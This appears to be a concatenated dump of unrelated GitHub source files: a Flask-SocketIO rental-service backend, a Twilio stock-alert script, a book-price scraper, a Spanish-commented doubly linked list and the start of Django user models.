handle_reload_catalog():\n # Получение данных об объявлении\n catalog = db.session.query(RentOut, Item).join(Item, RentOut.id_item == Item.id_item) \\\n .filter(RentOut.status == \"активно\") \\\n .order_by(RentOut.id_rent_out.desc()).all()\n catalog_list = [{'id_rent_out': a.RentOut.id_rent_out,\n 'id_item': a.RentOut.id_item,\n 'name': a.Item.name,\n 'category': a.Item.category,\n 'description': a.Item.description,\n 'rent_price': a.Item.rent_price,\n 'image_url': a.Item.image_url\n } for a in catalog]\n # Упаковка данных в json\n catalog_json = json.dumps(catalog_list)\n # Отправка события 'catalog' с данными на клиент\n socketio.emit('catalog', catalog_json)\n\n\n# Добавление жалобы\n@socketio.on('add_complaint')\ndef add_complaint(data):\n # Распаковка json\n data_json = json.loads(data)\n id_rent_in = data_json['id_rent_in']\n description = data_json['description']\n status = \"рассматривается\"\n id_user = current_user.id\n\n # Создание экземпляра класса и запись в БД\n complaint = Complaint(id_rent_in=id_rent_in, description=description, status=status, id_user=id_user)\n db.session.add(complaint)\n db.session.commit()\n\n # Отправка события 'connect' с сервера на клиент\n socketio.emit('connect')\n\n\n# Обновление страницы с жалобами\n@socketio.on('reload_complaint')\ndef handle_reload_complaint():\n # 
Получение данных о всех жалобах из БД\n complaint = db.session.query(Complaint, RentIn, RentOut, Item, User) \\\n .join(RentIn, Complaint.id_rent_in == RentIn.id_rent_in) \\\n .join(RentOut, RentIn.id_rent_out == RentOut.id_rent_out) \\\n .join(Item, RentOut.id_item == Item.id_item) \\\n .join(User, Complaint.id_user == User.id) \\\n .order_by(RentIn.id_rent_in.desc()).all()\n complaint_list = [{'id_rent_in': a.RentIn.id_rent_in,\n 'id_rent_out': a.RentOut.id_rent_out,\n 'id_item': a.RentOut.id_item,\n 'id_complaint': a.Complaint.id_complaint,\n 'username': a.User.username,\n 'phone': a.User.phone,\n 'email': a.User.email,\n 'name': a.Item.name,\n 'category': a.Item.category,\n 'description': a.Item.description,\n 'rent_price': a.Item.rent_price,\n 'image_url': a.Item.image_url,\n 'date_rent_start': a.RentIn.date_rent_start,\n 'date_rent_finish': a.RentIn.date_rent_finish,\n 'note': a.RentIn.note,\n 'status': a.RentIn.status,\n 'status_complaint': a.Complaint.status,\n 'description_complaint': a.Complaint.description\n } for a in complaint]\n # Упаковка в json и отправка на нужный адрес\n complaint_json = json.dumps(complaint_list, default=str)\n socketio.emit('complaint', complaint_json)\n\n\n# Обновление страницы с жалобами пользователя\n@socketio.on('reload_my_complaint')\ndef handle_reload_my_complaint():\n # Получение всех жалоб текущего пользователя из БД\n complaint = db.session.query(Complaint, RentIn, RentOut, Item, User) \\\n .join(RentIn, Complaint.id_rent_in == RentIn.id_rent_in) \\\n .join(RentOut, RentIn.id_rent_out == RentOut.id_rent_out) \\\n .join(Item, RentOut.id_item == Item.id_item) \\\n .join(User, Complaint.id_user == User.id) \\\n .filter(Complaint.id_user == current_user.id)\\\n .order_by(RentIn.id_rent_in.desc()).all()\n complaint_list = [{'id_rent_in': a.RentIn.id_rent_in,\n 'id_rent_out': a.RentOut.id_rent_out,\n 'id_item': a.RentOut.id_item,\n 'id_complaint': a.Complaint.id_complaint,\n 'category': a.Item.category,\n 'description': a.Item.description,\n 'rent_price': a.Item.rent_price,\n 'image_url': a.Item.image_url,\n 'date_rent_start': a.RentIn.date_rent_start,\n 'date_rent_finish': a.RentIn.date_rent_finish,\n 'note': a.RentIn.note,\n 'status': a.RentIn.status,\n 'status_complaint': a.Complaint.status,\n 'description_complaint': a.Complaint.description\n } for a in complaint]\n # Упаковка и отправка по адресу\n complaint_json = json.dumps(complaint_list, default=str)\n socketio.emit('my_complaint', complaint_json)\n\n\n# Обновление статуса жалобы\n@socketio.on('resolved')\ndef handle_resolved(id_complaint):\n complaint = Complaint.query.get(id_complaint)\n if complaint.status == \"рассматривается\":\n complaint.status = \"жалоба закрыта\"\n db.session.commit()\n socketio.emit('connect')\n\n\n# Удаление объявление\n@socketio.on('del_rent_out')\ndef handle_del_rent_out(id_rent_out):\n rent_out = RentOut.query.get(id_rent_out)\n bags = Bag.query.filter(Bag.id_rent_out == id_rent_out).all()\n for b in bags:\n db.session.delete(b)\n db.session.commit()\n rent_out.status = \"удалено\"\n db.session.commit()\n socketio.emit('connect')\n\n\n# Обновление страницы с объявлениями текущего пользователя\n@socketio.on('reload_my_rent_out')\ndef handle_reload_my_rent_out():\n # Получение всех действующих объявлений текущего пользователя из БД\n catalog = db.session.query(RentOut, Item).join(Item, RentOut.id_item == Item.id_item) \\\n .filter(RentOut.id_user == current_user.id, RentOut.status != \"удалено\") \\\n .order_by(RentOut.id_rent_out.desc()).all()\n catalog_list = 
[{'id_rent_out': a.RentOut.id_rent_out,\n 'id_item': a.RentOut.id_item,\n 'name': a.Item.name,\n 'category': a.Item.category,\n 'description': a.Item.description,\n 'rent_price': a.Item.rent_price,\n 'image_url': a.Item.image_url\n } for a in catalog]\n # Упаковка и отправка по указанному адресу\n catalog_json = json.dumps(catalog_list)\n socketio.emit('my_rent_out', catalog_json)\n\n\n# Функция добавления объявления в избранные объявления\n@socketio.on('add_bag')\ndef handle_add_bag(id_rent_out):\n id_user = current_user.id\n id_rent_out = id_rent_out\n bag = Bag(id_user=id_user, id_rent_out=id_rent_out)\n db.session.add(bag)\n db.session.commit()\n socketio.emit('connect')\n\n\n# Функция удаления объявления из избранных объявлений\n@socketio.on('del_bag')\ndef handle_del_bag(id_bag):\n bag = Bag.query.get(id_bag)\n db.session.delete(bag)\n db.session.commit()\n socketio.emit('connect')\n\n\n# Обновление страницы с избранными объявлениями\n@socketio.on('reload_bag')\ndef handle_reload_bag():\n # Получение из БД всех активных объявлений из избранных\n bag = db.session.query(Bag, RentOut, Item).join(RentOut, Bag.id_rent_out == RentOut.id_rent_out) \\\n .join(Item, RentOut.id_item == Item.id_item) \\\n .filter(Bag.id_user == current_user.id, RentOut.status == \"активно\") \\\n .order_by(Bag.id_bag.desc()).all()\n bags = [{'id_bag': a.Bag.id_bag,\n 'id_rent_out': a.RentOut.id_rent_out,\n 'id_item': a.RentOut.id_item,\n 'name': a.Item.name,\n 'category': a.Item.category,\n 'description': a.Item.description,\n 'rent_price': a.Item.rent_price,\n 'image_url': a.Item.image_url\n } for a in bag]\n # Упаковка и отправка на указанный адрес\n bags_json = json.dumps(bags)\n socketio.emit('bag', bags_json)\n\n\n# Создание заявки на аренду\n@socketio.on('add_rent_in')\ndef handle_add_rent_in(data):\n # Распаковка данных с клиента\n data_json = json.loads(data)\n status = 'подана'\n date_rent_start = data_json['date_rent_start']\n date_rent_finish = data_json['date_rent_finish']\n note = data_json['note']\n id_rent_out = data_json['id_rent_out']\n id_user = current_user.id\n # Создание экземпляра класса и запись в БД\n rent_in = RentIn(status=status, date_rent_start=date_rent_start, date_rent_finish=date_rent_finish, note=note,\n id_rent_out=id_rent_out, id_user=id_user)\n db.session.add(rent_in)\n db.session.commit()\n\n socketio.emit('connect')\n\n\n# Функция удаления заявки\n@socketio.on('del_rent_in')\ndef handle_del_rent_in(id_rent_in):\n rent_in = RentIn.query.get(id_rent_in)\n db.session.delete(rent_in)\n db.session.commit()\n socketio.emit('connect')\n\n\n# Функция одобрения заявки\n@socketio.on('approve')\ndef handle_approve(id_rent_in, id_rent_out):\n rent_in = RentIn.query.get(id_rent_in)\n rent_out = RentOut.query.get(id_rent_out)\n rent_out.status = \"неактивно\"\n rent_in.status = \"одобрена\"\n db.session.commit()\n socketio.emit('connect')\n\n\n# Функция изменения статуса аренды при начале аренды\n@socketio.on('rent_start')\ndef handle_rent_start(id_rent_in):\n rent_in = RentIn.query.get(id_rent_in)\n if rent_in.status == \"одобрена\":\n rent_in.status = \"в аренде\"\n db.session.commit()\n socketio.emit('connect')\n\n\n# Функция изменения статуса аренды при конце аренды\n@socketio.on('rent_finish')\ndef handle_rent_finish(id_rent_in, id_rent_out):\n rent_in = RentIn.query.get(id_rent_in)\n if rent_in.status == \"в аренде\":\n rent_out = RentOut.query.get(id_rent_out)\n rent_out.status = \"активно\"\n rent_in.status = \"аренда завершена\"\n db.session.commit()\n 
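# 'connect' is a reserved Socket.IO event name, so reusing it as a refresh\n # signal is surprising; a custom event (assumption) would be clearer, e.g.:\n # socketio.emit('data_changed')\n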
socketio.emit('connect')\n\n\n# Обновление данных на странице исходящих заявок текущего пользователя\n@socketio.on('reload_outgoing')\ndef handle_reload_outgoing():\n # Получение всех действующих исходящих заявок пользователя из БД\n outgoing = db.session.query(RentIn, RentOut, Item).join(RentOut, RentIn.id_rent_out == RentOut.id_rent_out) \\\n .join(Item, RentOut.id_item == Item.id_item) \\\n .filter(RentIn.id_user == current_user.id, RentIn.status == \"подана\") \\\n .order_by(RentIn.id_rent_in.desc()).all()\n outgoings = [{'id_rent_in': a.RentIn.id_rent_in,\n 'id_rent_out': a.RentOut.id_rent_out,\n 'id_item': a.RentOut.id_item,\n 'name': a.Item.name,\n 'category': a.Item.category,\n 'description': a.Item.description,\n 'rent_price': a.Item.rent_price,\n 'image_url': a.Item.image_url,\n 'date_rent_start': a.RentIn.date_rent_start,\n 'date_rent_finish': a.RentIn.date_rent_finish,\n 'note': a.RentIn.note,\n 'status': a.RentIn.status\n } for a in outgoing]\n # Упаковка и отправка на указанный адрес\n outgoings_json = json.dumps(outgoings)\n socketio.emit('outgoing', outgoings_json)\n\n\n# Обновление данных на странице входящих заявок текущего пользователя\n@socketio.on('reload_incoming')\ndef handle_reload_incoming():\n # Получение всех действующих входящих заявок пользователя из БД\n incoming = db.session.query(RentIn, RentOut, Item, User).join(RentOut, RentIn.id_rent_out == RentOut.id_rent_out) \\\n .join(Item, RentOut.id_item == Item.id_item) \\\n .join(User, RentIn.id_user == User.id) \\\n .filter(RentOut.id_user == current_user.id, RentIn.status == \"подана\") \\\n .order_by(RentIn.id_rent_in.desc()).all()\n incomings = [{'id_rent_in': a.RentIn.id_rent_in,\n 'id_rent_out': a.RentOut.id_rent_out,\n 'id_item': a.RentOut.id_item,\n 'username': a.User.username,\n 'phone': a.User.phone,\n 'email': a.User.email,\n 'name': a.Item.name,\n 'category': a.Item.category,\n 'description': a.Item.description,\n 'rent_price': a.Item.rent_price,\n 'image_url': a.Item.image_url,\n 'date_rent_start': a.RentIn.date_rent_start,\n 'date_rent_finish': a.RentIn.date_rent_finish,\n 'note': a.RentIn.note,\n 'status': a.RentIn.status\n } for a in incoming]\n # Упаковка и отправка на указанный адрес\n incomings_json = json.dumps(incomings)\n socketio.emit('incoming', incomings_json)\n\n\n# Обновление данных страницы сданных предметов текущего пользователя\n@socketio.on('reload_notirent')\ndef handle_reload_notirent():\n # Получение из БД записей текущих сдач в аренду пользователя\n notirent = db.session.query(RentIn, RentOut, Item, User).join(RentOut, RentIn.id_rent_out == RentOut.id_rent_out) \\\n .join(Item, RentOut.id_item == Item.id_item) \\\n .join(User, RentIn.id_user == User.id) \\\n .filter(RentOut.id_user == current_user.id, or_(RentIn.status == \"одобрена\", RentIn.status == \"в аренде\")) \\\n .order_by(RentIn.id_rent_in.desc()).all()\n notirents = [{'id_rent_in': a.RentIn.id_rent_in,\n 'id_rent_out': a.RentOut.id_rent_out,\n 'id_item': a.RentOut.id_item,\n 'username': a.User.username,\n 'phone': a.User.phone,\n 'email': a.User.email,\n 'name': a.Item.name,\n 'category': a.Item.category,\n 'description': a.Item.description,\n 'rent_price': a.Item.rent_price,\n 'image_url': a.Item.image_url,\n 'date_rent_start': a.RentIn.date_rent_start,\n 'date_rent_finish': a.RentIn.date_rent_finish,\n 'note': a.RentIn.note,\n 'status': a.RentIn.status\n } for a in notirent]\n # Упаковка и отправка на указанный адрес\n notirents_json = json.dumps(notirents)\n socketio.emit('notirent', notirents_json)\n\n\n# 
Обновление данных страницы взятых в аренду предметов текущим пользователем\n@socketio.on('reload_irent')\ndef handle_reload_irent():\n irent = db.session.query(RentIn, RentOut, Item, User).join(RentOut, RentIn.id_rent_out == RentOut.id_rent_out) \\\n .join(Item, RentOut.id_item == Item.id_item) \\\n .join(User, RentOut.id_user == User.id) \\\n .filter(RentIn.id_user == current_user.id, or_(RentIn.status == \"одобрена\", RentIn.status == \"в аренде\")) \\\n .order_by(RentIn.id_rent_in.desc()).all()\n irents = [{'id_rent_in': a.RentIn.id_rent_in,\n 'id_rent_out': a.RentOut.id_rent_out,\n 'id_item': a.RentOut.id_item,\n 'username': a.User.username,\n 'phone': a.User.phone,\n 'email': a.User.email,\n 'name': a.Item.name,\n 'category': a.Item.category,\n 'description': a.Item.description,\n 'rent_price': a.Item.rent_price,\n 'image_url': a.Item.image_url,\n 'date_rent_start': a.RentIn.date_rent_start,\n 'date_rent_finish': a.RentIn.date_rent_finish,\n 'note': a.RentIn.note,\n 'status': a.RentIn.status\n } for a in irent]\n # Упаковка и отправка на указанный адрес\n irents_json = json.dumps(irents)\n socketio.emit('irent', irents_json)\n\n\n# Обновление страницы истории взятия в аренду предметов текущим пользователем\n@socketio.on('reload_irent_history')\ndef handle_reload_irent_history():\n irent = db.session.query(RentIn, RentOut, Item, User).join(RentOut, RentIn.id_rent_out == RentOut.id_rent_out) \\\n .join(Item, RentOut.id_item == Item.id_item) \\\n .join(User, RentOut.id_user == User.id) \\\n .filter(RentIn.id_user == current_user.id, RentIn.status == \"аренда завершена\") \\\n .order_by(RentIn.id_rent_in.desc()).all()\n irents = [{'id_rent_in': a.RentIn.id_rent_in,\n 'id_rent_out': a.RentOut.id_rent_out,\n 'id_item': a.RentOut.id_item,\n 'username': a.User.username,\n 'phone': a.User.phone,\n 'email': a.User.email,\n 'name': a.Item.name,\n 'category': a.Item.category,\n 'description': a.Item.description,\n 'rent_price': a.Item.rent_price,\n 'image_url': a.Item.image_url,\n 'date_rent_start': a.RentIn.date_rent_start,\n 'date_rent_finish': a.RentIn.date_rent_finish,\n 'note': a.RentIn.note,\n 'status': a.RentIn.status\n } for a in irent]\n # Упаковка и отправка на указанный адрес\n irents_json = json.dumps(irents)\n socketio.emit('irent_history', irents_json)\n\n\n# Обновление страницы истории сдачи в аренду предметов текущим пользователем\n@socketio.on('reload_notirent_history')\ndef handle_reload_notirent_history():\n notirent = db.session.query(RentIn, RentOut, Item, User).join(RentOut, RentIn.id_rent_out == RentOut.id_rent_out) \\\n .join(Item, RentOut.id_item == Item.id_item) \\\n .join(User, RentIn.id_user == User.id) \\\n .filter(RentOut.id_user == current_user.id, RentIn.status == \"аренда завершена\") \\\n .order_by(RentIn.id_rent_in.desc()).all()\n notirents = [{'id_rent_in': a.RentIn.id_rent_in,\n 'id_rent_out': a.RentOut.id_rent_out,\n 'id_item': a.RentOut.id_item,\n 'username': a.User.username,\n 'phone': a.User.phone,\n 'email': a.User.email,\n 'name': a.Item.name,\n 'category': a.Item.category,\n 'description': a.Item.description,\n 'rent_price': a.Item.rent_price,\n 'image_url': a.Item.image_url,\n 'date_rent_start': a.RentIn.date_rent_start,\n 'date_rent_finish': a.RentIn.date_rent_finish,\n 'note': a.RentIn.note,\n 'status': a.RentIn.status\n } for a in notirent]\n # Упаковка и отправка на указанный адрес\n notirents_json = json.dumps(notirents)\n socketio.emit('notirent_history', notirents_json)\n\n\n# Обработчик запуска сервера\nif __name__ == '__main__':\n 
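# allow_unsafe_werkzeug=True opts into Werkzeug's development server; a\n # production sketch (assumption) would pin host/port and run behind\n # eventlet or gevent, e.g.: socketio.run(app, host='127.0.0.1', port=5000)\n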
socketio.run(app, allow_unsafe_werkzeug=True)\n","repo_name":"PavelUrakov4942/RentalService","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":33840,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11745896576","text":"import requests\nfrom twilio.rest import Client\n\nSTOCK_NAME = \"TSLA\"\nCOMPANY_NAME = \"Tesla Inc\"\n\nSTOCK_ENDPOINT = \"https://www.alphavantage.co/query\"\nNEWS_ENDPOINT = \"https://newsapi.org/v2/everything\"\n\nSTOCK_API_KEY = \"YOUR-STOCK-API-KEY\"\nNEWS_API_KEY = \"YOUR-NEWS-API-KEY\"\n\naccount_sid = \"YOUR-ACCOUNT-SID\"\nauth_token = \"YOUR-AUTH-TOKEN\"\n\n\nSTOCK_PARAMETERS = {\n \"function\": \"TIME_SERIES_DAILY\",\n \"symbol\": STOCK_NAME,\n \"apikey\": STOCK_API_KEY\n}\n\nstock_response = requests.get(STOCK_ENDPOINT, params=STOCK_PARAMETERS)\nstock_data = stock_response.json()[\"Time Series (Daily)\"]\ndata_list = [value for (key, value) in stock_data.items()]\n\n# Closing prices for yesterday and the day before yesterday\nstock_yday = float(data_list[0][\"4. close\"])\nstock_dbyday = float(data_list[1][\"4. close\"])\n\ndifference = abs(stock_yday - stock_dbyday)\npercentage_difference = round(difference / stock_dbyday * 100, 2)\n\n\ndef difference_direction():\n if stock_dbyday > stock_yday:\n return \"📉\"\n elif stock_dbyday < stock_yday:\n return \"📈\"\n return \"\"\n\n\nif percentage_difference >= 5:\n NEWS_PARAMETERS = {\n \"apiKey\": NEWS_API_KEY,\n \"q\": \"Tesla\",\n \"sortBy\": \"publishedAt\"\n }\n\n news_response = requests.get(url=NEWS_ENDPOINT, params=NEWS_PARAMETERS)\n news_data = news_response.json()[\"articles\"]\n\n top_3 = news_data[:3]\n news_list = [(article[\"title\"], article[\"description\"]) for article in top_3]\n\n client = Client(account_sid, auth_token)\n for headline, brief in news_list:\n message = client.messages \\\n .create(\n body=f\"TSLA: {difference_direction()}{percentage_difference}% \"\n f\"Headline: {headline} \"\n f\"Brief: {brief}\",\n from_=\"+19895026250\",\n to=\"+34692448752\"\n )\n print(message.status)\n","repo_name":"BigEd12/Project_36","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39729746063","text":"import requests\nfrom bs4 import BeautifulSoup\nimport time\nimport csv\nimport re\nimport string\nimport pandas as pd\n\n\nclass FastBookScraper():\n \"\"\"\n A class that scrapes the website todostuslibros.com/mas_vendidos faster \\\n but with less information than BookScraper.\n\n Attributes:\n This class does not have public attributes\n\n Methods:\n scrape(): Scrapes the website\n data2csv(output_file): Creates and stores collected data into a csv \\\n in the given file path.\n download_covers(input_filepath, output_folder): Downloads and stores book \\\n covers.\n \"\"\"\n _url = \"https://www.todostuslibros.com/mas_vendidos\"\n _id = 0\n _dt = []\n _headers = {\n \"Accept\": \"text/html,application/xhtml+xml,\\\n application/xml;q=0.9,image/webp,*/*;q=0.8\",\n \"Accept-Encoding\": \"gzip, deflate, sdch, br\",\n \"Accept-Language\": \"en-US,en;q=0.8\",\n
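# Desktop-browser headers (assumption: the site applies basic bot\n # filtering) make the requests look like a normal browser session.\n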
\"Cache-Control\": \"no-cache\",\n \"dnt\": \"1\",\n \"Pragma\": \"no-cache\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) \\\n AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 \\\n Safari/537.36\"\n }\n\n def __init__(self):\n pass\n\n @classmethod\n def _generate_unique_id(cls, value):\n \"\"\"\n Sums value to class variable _id.\n\n Parameters:\n value (int): The value of the last id\n \"\"\"\n cls._id += value\n\n def _get_html(self, url):\n \"\"\"\n Gets an html from a url given.\n\n Parameters:\n url (string): The url of the website the html is extracted\n\n Returns:\n The html from the url given\n \"\"\"\n return requests.get(url, headers=self._headers)\n\n def _get_pages_links(self, soup):\n \"\"\"\n Gets pages links from an html given.\n\n Parameters:\n soup (object 'bs4.BeautifulSoup'): An html object of the \\\n first group of books.\n\n Returns:\n pages_urls (list): A list of the different url from all the \\\n pages where are books.\n \"\"\"\n pages_urls = []\n page_items = soup.findAll('a', attrs={'class': 'page-link'})\n # Deleting last item corresponding to the (next_page button)\n page_items.pop()\n\n # Obtaining last page\n last_p = page_items.pop()\n max_p = int(last_p.contents[0])\n\n # Obtaining link\n full_link = last_p.attrs['href']\n link = full_link.rstrip(string.digits)\n\n for i in range(1, max_p + 1):\n # Obtaining list of links for all the pages\n pages_urls.append(link + str(i))\n\n return pages_urls\n\n def _get_title(self, book):\n \"\"\"\n Extracts the book title.\n\n Parameters:\n book (object 'bs4.BeautifulSoup'): The information of a \\\n book in html\n\n Returns:\n title (string): The title of the book given\n \"\"\"\n title = book.find(class_=\"title\").contents[1].contents[0]\n return title.strip()\n\n def _get_subtitle(self, book):\n \"\"\"\n Extracts the book subtitle.\n\n Parameters:\n book (object 'bs4.BeautifulSoup'): The information of a book \\\n in html\n\n Returns:\n subtitle (string): The subtitle of the book given\n \"\"\"\n # There might be no subtitles\n try:\n subtitle = book.find(class_=\"subtitle\").contents[0].contents[0]\n\n except IndexError:\n subtitle = \"\"\n\n return subtitle.strip()\n\n def _get_author(self, book):\n \"\"\"\n Extracts the book author.\n\n Parameters:\n book (object 'bs4.BeautifulSoup'): The information of a \\\n book in html\n\n Returns:\n author (string): The author of the book given\n \"\"\"\n autor = book.find(class_=\"author\").contents[0].contents[0]\n return autor.strip()\n\n def _get_editorial_and_ISBN(self, book):\n \"\"\"\n Extracts the book editorial and ISBN.\n\n Parameters:\n book (object 'bs4.BeautifulSoup'): The information of a \\\n book in html\n\n Returns:\n ed_isbn (list): The editorial and ISBN of the book\n \"\"\"\n ed_isbn = book.find(class_=\"data\").contents[0].split(\"/\")\n # Deleting all unwanted whitespcaes\n return [s.strip() for s in ed_isbn]\n\n def _get_price(self, book):\n \"\"\"\n Extracts the book price.\n\n Parameters:\n book (object 'bs4.BeautifulSoup'): The information of a \\\n book in html\n\n Returns:\n price (list): The price of the book given\n \"\"\"\n price = book.find(class_=\"book-price\").contents[1].contents[0]\n # Digits are extracted from the string\n return re.findall(r'\\d+\\.\\d+|\\d+', price)[0]\n\n def _get_price_no_taxes(self, book):\n \"\"\"\n Extracts the book price without taxes.\n\n Parameters:\n book (object 'bs4.BeautifulSoup'): The information of a \\\n book in html\n\n 
Returns:\n            untaxed price (str): The price without taxes of the book given\n        \"\"\"\n        untaxed = book.find(class_=\"book-price\").contents[2]\n        # Digits are extracted from the string\n        return re.findall(r'\\d+\\.\\d+|\\d+', untaxed)[0]\n\n    def _get_book_image(self, book):\n        \"\"\"\n        Extracts the book cover.\n\n        Parameters:\n            book (object 'bs4.BeautifulSoup'): The information of a \\\n            book in html\n\n        Returns:\n            cover (string): The url of the cover's picture\n        \"\"\"\n        # TODO: Is extracting the link alone sufficient?\n        img = book.find(class_=\"book-image col-3 col-sm-3 col-md-2\")\n        return img.a.img['src']\n\n    def _get_books(self, soup):\n        \"\"\"\n        Extracts the information from all books and appends them to the object.\n\n        Parameters:\n            soup (object 'bs4.BeautifulSoup'): An html of a page of different \\\n            books given\n        \"\"\"\n        book_info = dict()\n        books = soup.find_all(class_=\"book row\")\n\n        for book in books:\n            self._generate_unique_id(1)\n            book_info = {\"id\": self._id,\n                         \"title\": self._get_title(book),\n                         \"subtitle\": self._get_subtitle(book),\n                         \"author\": self._get_author(book),\n                         \"editorial\": self._get_editorial_and_ISBN(book)[0],\n                         \"ISBN\": self._get_editorial_and_ISBN(book)[1],\n                         \"price (€)\": self._get_price(book),\n                         \"untaxed price (€)\": self._get_price_no_taxes(book),\n                         \"book cover\": self._get_book_image(book)\n                         }\n\n            self._dt.append(book_info)\n\n    def scrape(self):\n        \"\"\"\n        Scrapes the website.\n        \"\"\"\n        print(\"Web Scraping of books data from {} \".format(self._url) +\n              \"This process could take about 2 minutes.\\n\")\n\n        # Start timer\n        start_time = time.time()\n\n        # Get main page\n        html_page = self._get_html(self._url)\n        soup = BeautifulSoup(html_page.content, features=\"html.parser\")\n\n        # Loop through all pages and get their relevant content\n        for page in self._get_pages_links(soup):\n\n            html_page = self._get_html(page)\n            soup = BeautifulSoup(html_page.content, features=\"html.parser\")\n            self._get_books(soup)\n\n    def data2csv(self, output_file):\n        \"\"\"\n        Turns the data into a csv file to the path given.\n\n        Parameters:\n            output_file (string): File path for the output.\n        \"\"\"\n        with open(output_file, 'w', encoding='utf-8') as csvfile:\n            writer = csv.DictWriter(csvfile, fieldnames=self._dt[0].keys())\n            writer.writeheader()\n            writer.writerows(self._dt)\n\n    def download_covers(self, input_filepath, output_folder):\n        \"\"\"\n        Downloads and stores book cover images, giving them their book \\\n        id as filename.\n\n        Parameters:\n            input_filepath (string): Filepath to scraped csv.\n            output_folder (string): Path to the folder where \\\n            images will be stored.\n        \"\"\"\n        df = pd.read_csv(input_filepath, usecols=['id', 'book cover'])\n        for i in df.index:\n            html = self._get_html(df[\"book cover\"][i])\n            if html.status_code == 200:\n                output = open(output_folder + '/' + str(df[\"id\"][i]) +\n                              '.gif', \"wb\")\n\n                for chunk in html:\n                    output.write(chunk)\n\n                output.close()\n","repo_name":"MartaCollPol/WebScraping","sub_path":"src/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":9237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35958043263","text":"class Nodo:\n    def __init__(self, dato):\n        self.dato = dato\n        self.siguiente = None\n        self.anterior = None\n\nclass ListaDoble:\n    def __init__(self):\n        self.head = None\n        self.end = None\n\n    def añadirNodoPrincipio(self, dato):\n        nuevoNodo = Nodo(dato)\n\n        # Check whether the list is empty\n        if self.head == None:\n            
print(\"Ingresando nodo con lista vacia\")\n self.head = nuevoNodo\n self.end = nuevoNodo\n \n #Si por lo menos hay un nodo, insertamos al inicio\n else:\n print(\"Insertando nodo al principio\")\n self.head.anterior = nuevoNodo\n nuevoNodo.siguiente = self.head\n self.head = nuevoNodo\n\n def añadirNodoFinal(self, dato):\n nuevoNodo = Nodo(dato)\n\n #insertamos si la lista esta vacia\n if self.head == None:\n print(\"Ingresando nodo con lista vacia\")\n self.head = nuevoNodo\n self.end = nuevoNodo\n\n #si por lo menos hay un nodo, insertamos al final\n else:\n print(\"Insertando nodo al final\")\n self.end.siguiente = nuevoNodo\n nuevoNodo.anterior = self.end\n self.end = nuevoNodo\n\n\n def imprimirLista(self):\n print(\"*** Imprimiendo lista ***\")\n nodoTemporal = Nodo(\"\")\n\n nodoTemporal = self.head\n contador = 0\n while nodoTemporal != None:\n contador += 1\n print(\"Nodo:\"+str(contador)+\" -> \"+nodoTemporal.dato)\n nodoTemporal = nodoTemporal.siguiente\n\n print(\"*** Lista Terminada ***\")\n\n def borrarNodo(self, dato):\n #creamos un nodo temporal\n nodoTemporal = Nodo(\"\")\n\n #el temporal empieza en la cabeza\n nodoTemporal = self.head\n\n #Mientras que el temporal no sea nulo\n while nodoTemporal != None:\n\n #validamos si ese nodo es el que busco\n if nodoTemporal.dato == dato:\n\n #Si ese nodo es la cabeza\n if nodoTemporal == self.head:\n print(\"Borrando dato en la cabeza\")\n self.head = self.head.siguiente\n nodoTemporal.siguiente = None\n self.head.anterior = None\n #Si ese nodo es la cola\n elif nodoTemporal == self.end:\n print(\"Borrando dato en la cola\")\n self.end = self.end.anterior\n nodoTemporal.anterior = None\n self.end.siguiente = None\n #Si no es ni la cola ni la cabeza\n else:\n print(\"Borrando dato del medio\")\n nodoTemporal.anterior.siguiente = nodoTemporal.siguiente\n nodoTemporal.siguiente.anterior = nodoTemporal.anterior\n nodoTemporal.siguiente = nodoTemporal.anterior = None\n\n nodoTemporal = nodoTemporal.siguiente\n\n\n\n\n ","repo_name":"ViannJu/IPC2_Ejemplos_2","sub_path":"Lista DobleEnlazada/Estructuras.py","file_name":"Estructuras.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"19915278630","text":"#rationalmap/models.py\n\nfrom django.db import models \n\nclass User(models.Model): \n \n user_id = models.AutoField(primary_key=True)\n \n #user_name includes first and last names\n first_name = models.CharField(max_length=30)\n last_name = models.CharField(max_length=40)\n \n #email recovered from credentials' extraction external method\n email = models.EmailField()\n \n EMAIL_TYPE_CHOICES = (\n ('gmail', 'Gmail'),\n ('hotmail', 'Hotmail'),\n ('other', 'Other')\n )\n\n email_type = models.CharField(max_length=7,choices=EMAIL_TYPE_CHOICES)\n \n EMAIL_USE_CHOICES = (\n (1, 'Personal'),\n (2, 'Freelance'),\n (3, 'Enterprise'),\n )\n \n email_use = models.IntegerField(choices=EMAIL_USE_CHOICES)\n\n LANGUAGE_CHOICES = (\n ('es', 'Spanish'),\n ('en', 'English'),\n )\n \n pref_language = models.CharField(max_length=2,choices=LANGUAGE_CHOICES,default='en')\n \n TIMEZONE_CHOICES = (\n ('-12', 'GMT -12:00 Eniwetok, Kwajalein'),\n ('-11.0', 'GMT -11:00 Midway Island, Samoa'),\n ('-10.0', 'GMT -10:00 Hawaii'),\n ('-9.0', 'GMT -9:00 Alaska'),\n ('-8.0', 'GMT -8:00 Pacific Time (US & Canada)'),\n ('-7.0', 'GMT -7:00 Mountain Time (US & Canada)'),\n ('-6.0', 'GMT -6:00 Central Time (US & Canada, Mexico City'),\n ('-5.0', 'GMT -5:00 Eastern Time (US 
